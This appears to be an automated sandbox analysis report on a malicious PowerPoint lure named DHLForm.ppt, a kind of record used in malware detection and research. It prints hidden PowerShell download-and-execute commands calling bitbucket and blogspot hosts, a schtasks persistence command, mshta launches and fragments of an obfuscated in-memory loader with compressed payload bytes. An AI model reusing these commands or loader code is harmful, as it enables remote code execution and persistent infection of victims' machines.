,11,47,111,67,194,172,172,51,149,117,78,87,186,131,59,171,249,212,117,156,6,235,166,107,105,237,128,205,186,118,201,207,249,117,213,160,245,159,251,191,33,221,79,104,154,51,12,191,41,252,125,96,18,138,112,54,0,44,53,105,98,8,251,108,210,194,16,126,204,164,141,33,72,153,26,214,180,226,82,93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() return $byteOutArray }}function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")$v4 = "v4.0"$dictionary.Add($hello, $v4)$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters$v1 = "Sys@@@".Replace("@@@","tem.dll")$CompilerParametres.ReferencedAssemblies.Add($v1)$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")$CompilerParametres.IncludeDebugInformation = $false$CompilerParametres.GenerateExecutable = $false$CompilerParametres.GenerateInMemory = $true$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"$BB = Decompress($BB)[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)[Byte[]] $Bytes = 
Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,7,152,28,197,177,56,62,59,187,59,105,195,93,239,238,205,198,187,89,229,209,237,41,156,68,184,147,64,58,162,201,201,128,201,18,57,24,88,224,4,6,4,135,176,113,68,8,129,19,62,11,140,101,27,219,56,27,108,225,140,35,78,216,56,201,182,140,206,56,231,108,63,63,219,32,253,43,116,79,216,93,33,222,179,223,239,251,235,211,205,118,87,117,247,244,116,87,87,87,87,87,87,31,123,198,102,45,169,105,90,10,254,118,239,214,180,71,52,254,55,161,237,253,223,6,248,203,123,31,205,107,15,219,143,207,122,36,113,204,227,179,78,190,228,210,201,230,85,215,180,47,190,230,220,43,154,231,159,123,229,149,237,117,205,243,46,108,94,115,237,149,205,75,175,108,30,122,252,243,155,87,180,47,184,112,113,46,231,204,149,101,156,112,152,166,29,147,72,106,63,127,106,226,92,85,238,83,154,158,200,36,44,77,59,13,106,102,48,108,215,117,16,110,170,20,19,28,214,185,222,154,22,254,106,143,38,9,174,17,122,226,165,154,214,79,255,195,223,224,135,254,189,21,202,125,1,125,12,228,75,246,248,200,251,147,90,246,57,180,69,215,63,168,159,21,137,90,16,63,34,18,95,188,238,194,235,215,97,189,95,32,191,235,180,176,222,145,34,214,46,190,102,242,154,243,49,146,148,117,196,15,61,35,94,209,9,248,191,248,154,11,47,111,67,194,172,172,51,149,117,78,87,186,131,59,171,249,212,117,156,6,235,166,107,105,237,128,205,186,118,201,207,249,117,213,160,245,159,251,191,33,221,79,104,154,51,12,191,41,252,125,96,18,138,112,54,0,44,53,105,98,8,251,108,210,194,16,126,204,164,141,33,72,153,26,214,180,226,82,93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() return $byteOutArray }}function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")$v4 = "v4.0"$dictionary.Add($hello, $v4)$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters$v1 = "Sys@@@".Replace("@@@","tem.dll")$CompilerParametres.ReferencedAssemblies.Add($v1)$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")$CompilerParametres.IncludeDebugInformation = $false$CompilerParametres.GenerateExecutable = $false$CompilerParametres.GenerateInMemory = $true$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"$BB = Decompress($BB)[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)[Byte[]] $Bytes = 
Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,7,152,28,197,177,56,62,59,187,59,105,195,93,239,238,205,198,187,89,229,209,237,41,156,68,184,147,64,58,162,201,201,128,201,18,57,24,88,224,4,6,4,135,176,113,68,8,129,19,62,11,140,101,27,219,56,27,108,225,140,35,78,216,56,201,182,140,206,56,231,108,63,63,219,32,253,43,116,79,216,93,33,222,179,223,239,251,235,211,205,118,87,117,247,244,116,87,87,87,87,87,87,31,123,198,102,45,169,105,90,10,254,118,239,214,180,71,52,254,55,161,237,253,223,6,248,203,123,31,205,107,15,219,143,207,122,36,113,204,227,179,78,190,228,210,201,230,85,215,180,47,190,230,220,43,154,231,159,123,229,149,237,117,205,243,46,108,94,115,237,149,205,75,175,108,30,122,252,243,155,87,180,47,184,112,113,46,231,204,149,101,156,112,152,166,29,147,72,106,63,127,106,226,92,85,238,83,154,158,200,36,44,77,59,13,106,102,48,108,215,117,16,110,170,20,19,28,214,185,222,154,22,254,106,143,38,9,174,17,122,226,165,154,214,79,255,195,223,224,135,254,189,21,202,125,1,125,12,228,75,246,248,200,251,147,90,246,57,180,69,215,63,168,159,21,137,90,16,63,34,18,95,188,238,194,235,215,97,189,95,32,191,235,180,176,222,145,34,214,46,190,102,242,154,243,49,146,148,117,196,15,61,35,94,209,9,248,191,248,154,11,47,111,67,194,172,172,51,149,117,78,87,186,131,59,171,249,212,117,156,6,235,166,107,105,237,128,205,186,118,201,207,249,117,213,160,245,159,251,191,33,221,79,104,154,51,12,191,41,252,125,96,18,138,112,54,0,44,53,105,98,8,251,108,210,194,16,126,204,164,141,33,72,153,26,214,180,226,82,93
Source: DHLForm.ppt Virustotal: Detection: 22%
Source: DHLForm.ppt ReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' /AUTOMATION -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\DHLForm.ppt'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou ''
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process created: C:\Windows\SysWOW64\mshta.exe MsHta https://bitly.com/yuiwqhdsavbdjagh
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe MsHtA 'http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES63A1.tmp' 'c:\Users\user\AppData\Local\Temp\lmts0v03\CSCCA8985A0394D48BFA864CA75A5282D3A.TMP'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES797A.tmp' 'c:\Users\user\AppData\Local\Temp\a0uccovc\CSCCC0B7B204924196A28CF024B8788083.TMP'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou ''
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process created: C:\Windows\SysWOW64\mshta.exe MsHta https://bitly.com/yuiwqhdsavbdjagh
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES63A1.tmp' 'c:\Users\user\AppData\Local\Temp\lmts0v03\CSCCA8985A0394D48BFA864CA75A5282D3A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES797A.tmp' 'c:\Users\user\AppData\Local\Temp\a0uccovc\CSCCC0B7B204924196A28CF024B8788083.TMP'
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File created: C:\Users\user\AppData\Local\Temp\{FA52A1A1-15FF-46EB-B281-0249065605E6} - OProcSessId.dat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:676:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: DHLForm.ppt Initial sample: OLE summary keywords = hammers
Source: DHLForm.ppt Initial sample: OLE document summary mmclips = 0
Source: DHLForm.ppt Initial sample: OLE summary subject = hammers
Source: DHLForm.ppt Initial sample: OLE document summary hiddenslides = 0
Source: DHLForm.ppt Initial sample: OLE document summary slides = 0
Source: DHLForm.ppt Initial sample: OLE document summary notes = 0
Source: DHLForm.ppt Initial sample: OLE document summary bytes = 0
Source: DHLForm.ppt Initial sample: OLE document summary presentationtarget = Widescreen

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\mshta.exe Code function: 6_2_0A2EE86D push cs; iretd 6_2_0A2EE86F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_053ABF22 push es; ret 9_2_053ABF36
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_053ABEE0 push es; ret 9_2_053ABF16
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_053ABEC0 push es; ret 9_2_053ABED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFAEB5B1594 push eax; ret 22_2_00007FFAEB5B15A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FBC200 push 00000005h; ret 40_2_02FBC218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FB4770 push 2C418B05h; ret 40_2_02FB47E3
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline'

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.dll

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\cmd.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
